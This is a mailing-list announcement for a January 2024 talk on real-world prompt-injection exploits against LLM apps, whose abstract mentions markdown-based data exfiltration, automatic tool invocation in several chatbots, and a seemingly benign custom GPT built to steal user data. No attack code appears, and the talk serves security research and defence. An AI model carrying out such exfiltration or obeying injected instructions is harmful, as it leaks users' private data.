SIGSEC talk: 11 Jan - New Important Instructions: Real-world exploits and mitigations in LLM Apps

55 views
Skip to first unread message

Leon Derczynski

unread,
Jan 9, 2024, 5:33:52 AMJan 9
to acl-s...@googlegroups.com
Happy new year! A spicy new talk to start us of, from the discoverer of the markdown chat exfiltration exploits:

New Important Instructions: Real-world exploits and mitigations in LLM Apps
2024, January 11th, 11.00 ET / 17.00 CET

Johann Rehberger (@wunderwuzzi23)

With the wide-spread rollout of Chatbots and LLM applications users are facing increased risks of scams, data exfiltration, loss of PII, and even remote code execution when processing untrusted data with LLM apps. This presentation will cover many demonstrations of real-world exploits in prominent LLM apps, such as automatic plugin/tool invocation and data exfiltration in ChatGPT, data exfiltration in Bing Chat, Anthropic Claude and Google Bard. The talk also highlights approaches vendors have taken to fix vulnerabilities. Finally, we also take a look how it is possible to use ChatGPT Builder to create a malicious GPT, while seemingly benign, is tricking users and stealing data.


Calendar link at https://sig.llmsecurity.net/talks/

See you there!!
Reply all
Reply to author
Forward
0 new messages